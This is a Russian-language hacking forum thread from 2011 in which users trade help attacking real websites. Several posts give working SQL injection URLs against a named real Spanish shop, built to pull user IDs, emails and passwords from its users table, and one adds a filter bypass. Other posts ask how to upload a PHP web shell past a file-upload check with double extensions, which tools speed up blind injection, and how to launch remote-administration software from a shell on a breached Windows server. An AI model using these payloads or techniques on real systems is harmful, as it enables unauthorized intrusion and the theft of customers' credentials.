 |
|
27.01.2011, 18:09
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 321
С нами:
8265206
Репутация:
-4
|
|
privateurl.com
в поле логин
хз как там раскрутить помогите и вообще кривая какаят +--+ не робит а /* робит чо эт знач помогите
кста через union можно ток select выполнять или апдэйт, delete, insert тож
|
|
|
28.01.2011, 01:12
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
С нами:
8580980
Репутация:
0
|
|
Так работает:
Код:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
А так нет:
Код:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
Почему? =\ |
|
|
|
28.01.2011, 01:50
|
|
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
С нами:
9382468
Репутация:
104
|
|
Сообщение от DCrypt
Так работает:
Код:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
А так нет:
Код:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
Почему? =\ Кажется там from фильтруется.
|
|
|
|
28.01.2011, 02:27
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
С нами:
8580980
Репутация:
0
|
|
Сообщение от None
Кажется там from фильтруется.
http://www.exploit-db.com/exploits/16060/
Где?
|
|
|
|
28.01.2011, 14:03
|
|
Участник форума
Регистрация: 27.08.2010
Сообщений: 154
С нами:
8268086
Репутация:
7
|
|
Сообщение от DCrypt
http://www.exploit-db.com/exploits/16060/
Где?
а при чем тут сама уязвимость, фильтруется на хосте, только не from, а select from, обходится так:
Код:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT%0a1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
|
|
|
|
28.01.2011, 15:04
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
подскажите софт или скрипт для быстрого блайнда? а то приходится долго ждать пока идет перебор
|
|
|
|
28.01.2011, 15:25
|
|
Познающий
Регистрация: 09.07.2010
Сообщений: 58
С нами:
8338646
Репутация:
0
|
|
поломал сайтец пришло время заливать шелл на стандартные вещи типо sheel.php.gif не помогают, помогите как бы! Внизу админки был найден корпарайт -> Copyright © 2006 Content-manager
|
|
|
|
28.01.2011, 23:04
|
|
Участник форума
Регистрация: 09.12.2010
Сообщений: 101
С нами:
8118326
Репутация:
-5
|
|
uname -a: Windows NT WINCTRL-7IBNPUN 6.1 build 7600 ((null)) i586
Safe-mode: ON (secure)
C:\ drwxrwxrwx
(это пхп шелл)
Можно как-то запускать радмин или что-то?
|
|
|
|
29.01.2011, 01:07
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
С нами:
9157119
Репутация:
74
|
|
Сообщение от KandidaT'S
поломал сайтец пришло время заливать шелл на стандартные вещи типо sheel.php.gif не помогают, помогите как бы! Внизу админки был найден корпарайт -> Copyright © 2006 Content-manager
Нереал так подсказать.
В админке есть залив файлов?
Сообщение от noviyuser
подскажите софт или скрипт для быстрого блайнда? а то приходится долго ждать пока идет перебор
Тулза от Пашкелы вроде умеет.
|
|
|
|
29.01.2011, 08:26
|
|
Познающий
Регистрация: 09.07.2010
Сообщений: 58
С нами:
8338646
Репутация:
0
|
|
заливка фаилов есть я так понел картинки и pdf заливаю sheel.php.pdf пишет неправильное название
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
